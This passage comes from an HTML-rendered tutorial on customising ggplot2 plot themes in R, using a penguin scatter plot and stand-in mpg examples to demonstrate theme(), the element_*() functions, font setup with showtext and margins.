&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;base_plot
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="graphics/base.png" alt="A scatter plot showing bill length (mm) vs body mass (g) for three penguin species which are seperated by colour; Adelie, Chinstrap and Gentoo. The plot is styled using standard basic ggplot2 theme; the plot background is grey with white gridlines. Title (Do heavier penguins have longer bills?) is left justified and the legend is to the right of the plot." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;We&amp;rsquo;ve created a basic scatter plot here. It&amp;rsquo;s perhaps one you&amp;rsquo;ve seen before. Perfectly functional, but lacks personality.&lt;/p&gt;
&lt;h3 id="using-built-in-ggplot2-themes"&gt;Using built in {ggplot2} themes&lt;/h3&gt;
&lt;p&gt;A good starting point for modifying your plot theme is actually to side-step &lt;code&gt;theme()&lt;/code&gt; and use one of the themes provided by {ggplot2}. The themes all have similar names: &lt;code&gt;theme_*()&lt;/code&gt;. I personally tend to start with &lt;code&gt;theme_minimal()&lt;/code&gt;, but feel free to try some others. For example, &lt;code&gt;theme_classic()&lt;/code&gt; or &lt;code&gt;theme_light()&lt;/code&gt;. The usage of these themes is super simple, just add it to your plot a bit like a &lt;code&gt;geom_*()&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; base_plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="graphics/minimal.png" alt="The same scatter plot as before but with the ggplot theme theme_minimal() applied. The background is now white and the grid lines are a light grey colour." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;We&amp;rsquo;ve now got a plot which looks cleaner. There are still some things that I don&amp;rsquo;t like. For example, I don&amp;rsquo;t like having my legend at the side of the plot and I don&amp;rsquo;t like the grid lines. We can modify these with &lt;code&gt;theme()&lt;/code&gt;.&lt;/p&gt;
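&lt;p&gt;Before moving on, if you&amp;rsquo;d like to compare a few of the built-in themes side by side, here is a minimal sketch. To keep it self-contained it uses a stand-in plot (&lt;code&gt;demo_plot&lt;/code&gt;, my own name) built from the &lt;code&gt;mpg&lt;/code&gt; data that ships with {ggplot2}; if you&amp;rsquo;re coding along, swap in &lt;code&gt;base_plot&lt;/code&gt; instead.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;ggplot2&amp;#34;)

# Stand-in scatter plot (an assumption for this sketch, not the penguins plot)
demo_plot = ggplot(mpg, aes(x = displ, y = hwy, colour = drv)) +
  geom_point()

# Every built-in theme is added to a plot in the same way
minimal_plot = demo_plot + theme_minimal()
classic_plot = demo_plot + theme_classic()
light_plot = demo_plot + theme_light()

classic_plot # print whichever one you want to inspect
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;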
&lt;h3 id="our-first-theme-modification"&gt;Our first theme() modification&lt;/h3&gt;
&lt;p&gt;The first thing I like to do is move the legend to the bottom of the plot. This is where we start to use the &lt;code&gt;theme()&lt;/code&gt; function to modify our plot appearance. This one isn&amp;rsquo;t too tricky: we just specify (as a string) where we want our legend to sit.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bottom&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;And here&amp;rsquo;s the result:&lt;/p&gt;
&lt;img src="graphics/legend.png" alt="The same scatter plot as before but the legend has been moved from the right of the plot to below the plot." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;Okay, that wasn&amp;rsquo;t too bad. The other options here would be &lt;code&gt;&amp;quot;top&amp;quot;&lt;/code&gt;, &lt;code&gt;&amp;quot;left&amp;quot;&lt;/code&gt; or &lt;code&gt;&amp;quot;right&amp;quot;&lt;/code&gt; to modify the position, or &lt;code&gt;&amp;quot;none&amp;quot;&lt;/code&gt; to remove the legend entirely.&lt;/p&gt;
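&lt;p&gt;As a rough illustration of those other options, the sketch below puts the legend on top of one plot and drops it from another. Again, &lt;code&gt;demo_plot&lt;/code&gt; is a stand-in built from the &lt;code&gt;mpg&lt;/code&gt; data so that the code runs on its own; it is not the penguins plot.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;ggplot2&amp;#34;)

# Stand-in plot (an assumption for this sketch)
demo_plot = ggplot(mpg, aes(x = displ, y = hwy, colour = drv)) +
  geom_point() +
  theme_minimal()

# Legend above the plot
legend_top = demo_plot + theme(legend.position = &amp;#34;top&amp;#34;)

# No legend at all
legend_none = demo_plot + theme(legend.position = &amp;#34;none&amp;#34;)

legend_top
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;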
&lt;h3 id="id-like-to-you-meet-my-friends-the-element_-functions"&gt;I&amp;rsquo;d like to you meet my friends: the element_*() functions&lt;/h3&gt;
&lt;p&gt;Most arguments of the &lt;code&gt;theme()&lt;/code&gt; function don&amp;rsquo;t take simple values like character or numeric values as arguments. A large number of the arguments take in a list of a specific class, where the list elements describe what the plot looks like. We can generate this list via an &lt;code&gt;element_*()&lt;/code&gt; function. The functions are &lt;code&gt;element_blank()&lt;/code&gt;, &lt;code&gt;element_rect()&lt;/code&gt;, &lt;code&gt;element_line()&lt;/code&gt;, &lt;code&gt;element_text()&lt;/code&gt;. Each of these functions has arguments which modify a given feature of our plot. I&amp;rsquo;ll run you through how each of the &lt;code&gt;element_*()&lt;/code&gt; functions might be used, but remember just like any other function &lt;code&gt;?element_*()&lt;/code&gt; will show you more&lt;/p&gt;
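&lt;p&gt;To see that these functions really do just build small description objects, you can create a couple outside of &lt;code&gt;theme()&lt;/code&gt; and inspect them. This is only a sketch: the variable names are mine, and the exact class names printed will depend on your {ggplot2} version.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;ggplot2&amp;#34;)

# A description of a grey line; nothing is drawn yet
axis_style = element_line(colour = &amp;#34;grey50&amp;#34;)
class(axis_style)

# A description of centred, 18pt text
title_style = element_text(hjust = 0.5, size = 18)
class(title_style)

# element_blank() carries no settings: it means draw nothing
class(element_blank())
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;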
&lt;h4 id="modifying-line-elements"&gt;Modifying line elements&lt;/h4&gt;
&lt;p&gt;Right now our plot doesn&amp;rsquo;t have any lines to indicate where the axes are. Suppose I want to make that clear. Because these are, well, &lt;em&gt;lines&lt;/em&gt;, I can use &lt;code&gt;element_line()&lt;/code&gt; to include them like so:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bottom&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_line&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;grey50&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Obviously we all have different favourite colours, so use whatever you like. Neutral colours (most likely shades of grey) are probably best for anything professional or for publication.&lt;/p&gt;
&lt;img src="graphics/axis.png" alt="The same scatter plot as above (theme minimal, legend at bottom) but grey lines to make the x and y axes clear have been added." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;So here we&amp;rsquo;ve specified the colour of the line element which corresponds to &lt;code&gt;axis.line&lt;/code&gt;. We can change other characteristics here like &lt;code&gt;linewidth&lt;/code&gt; or &lt;code&gt;linetype&lt;/code&gt;, but I&amp;rsquo;ll leave that for you to experiment with later.&lt;/p&gt;
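&lt;p&gt;If you want a head start on that experimenting, here is a small sketch that makes the axis lines thicker and dashed. The values are arbitrary, &lt;code&gt;demo_plot&lt;/code&gt; is a stand-in built from the &lt;code&gt;mpg&lt;/code&gt; data, and the &lt;code&gt;linewidth&lt;/code&gt; argument assumes {ggplot2} 3.4.0 or later.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;ggplot2&amp;#34;)

# Stand-in plot (an assumption for this sketch)
demo_plot = ggplot(mpg, aes(x = displ, y = hwy, colour = drv)) +
  geom_point() +
  theme_minimal()

dashed_axes = demo_plot +
  theme(
    axis.line = element_line(
      colour = &amp;#34;grey50&amp;#34;,
      linewidth = 1, # thicker than the default
      linetype = &amp;#34;dashed&amp;#34;
    )
  )

dashed_axes
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;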
&lt;h4 id="removing-plot-elements"&gt;Removing plot elements&lt;/h4&gt;
&lt;p&gt;The next thing I want to modify is the grid lines. I personally don&amp;rsquo;t like them so I&amp;rsquo;m going to remove them. This &lt;em&gt;could&lt;/em&gt; be done with &lt;code&gt;element_line()&lt;/code&gt; by matching the grid line colour to the background colour, but off the top of my head I don&amp;rsquo;t know what the background colour is, and there&amp;rsquo;s a much simpler solution: &lt;code&gt;element_blank()&lt;/code&gt;. This removes aspects of our plot by generating an empty list entry for that plot component.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bottom&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_line&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;grey50&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.grid &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="graphics/grid.png" alt="The same scatter plot as above (theme minimal, legend at bottom, grey axes) but grid lines have been removed, so that the points on the scatter plot are on a plain, white background." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;Assigning &lt;code&gt;element_blank()&lt;/code&gt; to &lt;code&gt;panel.grid&lt;/code&gt; removes all grid lines. If we only wanted to remove the minor ones, we would set &lt;code&gt;panel.grid.minor = element_blank()&lt;/code&gt;. If we wanted to remove only the vertical lines (for whatever reason), we can set &lt;code&gt;panel.grid.minor.x = element_blank()&lt;/code&gt; and &lt;code&gt;panel.grid.major.x = element_blank()&lt;/code&gt;. Removing only the horizontal ones is the same, but swap &lt;code&gt;x&lt;/code&gt; for &lt;code&gt;y&lt;/code&gt;. This shows that although &lt;code&gt;theme()&lt;/code&gt; might have 99 arguments, there is structure to argument names which reduces how many you really need to remember.&lt;/p&gt;
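&lt;p&gt;Here is how those variations might look in practice. As before, this is a sketch on a stand-in plot (&lt;code&gt;demo_plot&lt;/code&gt;, built from the &lt;code&gt;mpg&lt;/code&gt; data) rather than the penguins plot.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;ggplot2&amp;#34;)

# Stand-in plot (an assumption for this sketch)
demo_plot = ggplot(mpg, aes(x = displ, y = hwy, colour = drv)) +
  geom_point() +
  theme_minimal()

# Keep the major grid lines, drop the minor ones
no_minor = demo_plot +
  theme(panel.grid.minor = element_blank())

# Drop the vertical grid lines only (the ones tied to the x axis)
no_vertical = demo_plot +
  theme(
    panel.grid.major.x = element_blank(),
    panel.grid.minor.x = element_blank()
  )

no_vertical
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;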
&lt;h4 id="modifying-text-features"&gt;Modifying text features&lt;/h4&gt;
&lt;p&gt;Text features are the next thing I&amp;rsquo;m going to change. We&amp;rsquo;re going to do two things at once here:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;change the font for &lt;em&gt;all&lt;/em&gt; text features with the &lt;code&gt;text&lt;/code&gt; argument&lt;/li&gt;
&lt;li&gt;change the positioning and size of the plot title with the &lt;code&gt;plot.title&lt;/code&gt; argument&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We&amp;rsquo;ll adjust both of these via the &lt;code&gt;element_text()&lt;/code&gt; function:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bottom&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_line&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;grey50&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.grid &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;lato&amp;#34;&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;## modify font&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(hjust &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;18&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;## modify positioning and size&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="graphics/text.png" alt="The same scatter plot as above (theme minimal, legend at bottom, grey axes, no grid lines) but all text now uses the lato font, and the main plot title is centered and larger." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;The &lt;code&gt;family&lt;/code&gt; argument lets us specify the font: we&amp;rsquo;re using the lato font here. I won&amp;rsquo;t delve too much into fonts, but &lt;a href="https://cran.r-project.org/web/packages/showtext/vignettes/introduction.html" rel="external"&gt;{showtext}&lt;/a&gt; is a package that makes using a wide variety of fonts straightforward. I&amp;rsquo;d definitely recommend playing with fonts if you&amp;rsquo;re looking to develop a theme for a corporate identity, or simply add some personality to a plot.&lt;/p&gt;
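&lt;p&gt;For completeness, a font usually has to be registered with R before &lt;code&gt;family = &amp;quot;lato&amp;quot;&lt;/code&gt; will find it. One possible way of doing that with {showtext} is sketched below. It assumes you have an internet connection (the font is downloaded from Google Fonts), and it may not be exactly how the plots in this post were produced.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;showtext&amp;#34;) # also attaches {sysfonts}

# Download Lato from Google Fonts and register it under the name used in theme()
font_add_google(&amp;#34;Lato&amp;#34;, family = &amp;#34;lato&amp;#34;)

# Ask {showtext} to render text in all new graphics devices
showtext_auto()

# Check that the family is now available
font_families()
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;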
&lt;p&gt;The &lt;code&gt;hjust&lt;/code&gt; argument controls the &lt;em&gt;horizontal justification&lt;/em&gt;, essentially, the positioning of the text. &lt;code&gt;hjust = 0&lt;/code&gt; is left justification (the text is moved to the left), &lt;code&gt;hjust = 1&lt;/code&gt; is right justification (text moved to the right), and numbers between 0 and 1 will position the text somewhere between the far right and far left. Setting &lt;code&gt;hjust = 0.5&lt;/code&gt; centers the text for us. I&amp;rsquo;ve not used &lt;code&gt;vjust&lt;/code&gt;, but this argument adjusts the vertical justification. Note that on the y axis, &lt;code&gt;hjust&lt;/code&gt; moves the text along the axis, and &lt;code&gt;vjust&lt;/code&gt; moves the text closer to/further away from the y axis. The &lt;code&gt;size&lt;/code&gt; argument is just the font size in &lt;code&gt;pts&lt;/code&gt;, something we will all be familiar with. The result is that the text, especially the title, shines through a little more.&lt;/p&gt;
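&lt;p&gt;To get a feel for &lt;code&gt;hjust&lt;/code&gt;, it can help to try the extremes. The sketch below uses a stand-in plot with a made-up title (both are assumptions for illustration) and shows the title pushed left and right, plus the y axis title slid to the top of its axis.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;ggplot2&amp;#34;)

# Stand-in plot with a title (an assumption for this sketch)
demo_plot = ggplot(mpg, aes(x = displ, y = hwy, colour = drv)) +
  geom_point() +
  ggtitle(&amp;#34;A demo title&amp;#34;) +
  theme_minimal()

# hjust = 0: title at the far left; hjust = 1: title at the far right
left_title = demo_plot + theme(plot.title = element_text(hjust = 0))
right_title = demo_plot + theme(plot.title = element_text(hjust = 1))

# On the y axis, hjust moves the title along the axis (here, to the top)
y_title_top = demo_plot + theme(axis.title.y = element_text(hjust = 1))

right_title
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;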
&lt;h4 id="borders-and-backgrounds"&gt;Borders and backgrounds&lt;/h4&gt;
&lt;p&gt;Borders and backgrounds are next on our list of things to modify. We use &lt;code&gt;element_rect()&lt;/code&gt; (rect as in rectangle) to change the styling of things such as the background around our legend or the entire plot background. By default, the legend background will be the same as the plot background, so it isn&amp;rsquo;t actually obvious that the legend even has a background! We&amp;rsquo;re going to modify the plot background here. The plot is currently sitting on a white background, and the web page you&amp;rsquo;re viewing also has a white background. This means that the plot melts into the webpage. This isn&amp;rsquo;t necessarily a bad thing, but you might want to frame your plot a bit by putting it on a coloured background. Alternatively, you might have a corporate slide deck with a coloured background, and want the plot to melt into this background.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bottom&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_line&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;grey50&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.grid &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;lato&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(hjust &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;18&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.background &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_rect&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#dffffc&amp;#34;&lt;/span&gt;, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#dffffc&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;fill&lt;/code&gt; argument here changes the actual plot background. The &lt;code&gt;colour&lt;/code&gt; argument (&lt;code&gt;color&lt;/code&gt; will also work if you&amp;rsquo;re u-averse) controls the colour of a thin border all the way around the plot. The colour &lt;code&gt;#dffffc&lt;/code&gt; is a very pale blue, which ensures that there is sufficient contrast between the points and background of the plot. This is an important accessibility feature, so do think very carefully about how changing the background colour of your plot may impact the ability of other people to properly absorb the message you are trying to communicate. I&amp;rsquo;d generally avoid changing the background colour, but it&amp;rsquo;s useful here for demonstration purposes. To reiterate: if you &lt;em&gt;do&lt;/em&gt; change the background colour, take care to ensure that accessibility is not compromised.&lt;/p&gt;
&lt;img src="graphics/background.png" alt="The same scatter plot as above (theme minimal, legend at bottom, grey axes, no grid lines, modified text) but entire plot background has been changed to a pale blue colour." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;That brings to a close our introduction to each of the &lt;code&gt;element_*()&lt;/code&gt; functions. I know it was a bit traumatic before, but if you type &lt;code&gt;?theme&lt;/code&gt; into your R console, you&amp;rsquo;ll notice that the help page tells you which &lt;code&gt;element_*()&lt;/code&gt; function you need to use for each &lt;code&gt;theme()&lt;/code&gt; argument.&lt;/p&gt;
&lt;h4 id="creating-space"&gt;Creating space&lt;/h4&gt;
&lt;p&gt;The last function that we use to modify aspects of a theme is &lt;code&gt;margin()&lt;/code&gt;. &lt;code&gt;margin()&lt;/code&gt; is a little bit different to the &lt;code&gt;element_*()&lt;/code&gt; functions: instead of controlling colours, fonts and line types, it lets us create or remove space around certain aspects of our theme by modifying distances. If an argument needs to be modified with &lt;code&gt;margin()&lt;/code&gt;, it&amp;rsquo;s likely that the argument name looks like &lt;code&gt;something.margin&lt;/code&gt;. You may also notice that &lt;code&gt;element_text()&lt;/code&gt; has a margin argument - use &lt;code&gt;margin()&lt;/code&gt; here to create space around the text aspects of your plot.&lt;/p&gt;
&lt;p&gt;There are 5 arguments to &lt;code&gt;margin()&lt;/code&gt;: &lt;code&gt;t&lt;/code&gt;, &lt;code&gt;r&lt;/code&gt;, &lt;code&gt;b&lt;/code&gt;, &lt;code&gt;l&lt;/code&gt; and &lt;code&gt;unit&lt;/code&gt;. &lt;code&gt;t&lt;/code&gt;, &lt;code&gt;r&lt;/code&gt;, &lt;code&gt;b&lt;/code&gt; and &lt;code&gt;l&lt;/code&gt; are short for top, right, bottom and left - to remember the order, it&amp;rsquo;s just clockwise from the top. You should assign a number to these arguments, then &lt;code&gt;unit&lt;/code&gt; is simply the units of these values. &lt;code&gt;unit&lt;/code&gt; defaults to &lt;code&gt;pt&lt;/code&gt;, which scales well with text, but you can choose something else if that makes more sense to you.&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s now modify the space between (a) the plot title and the scatterplot itself and also (b) the legend and the x axis.&lt;/p&gt;
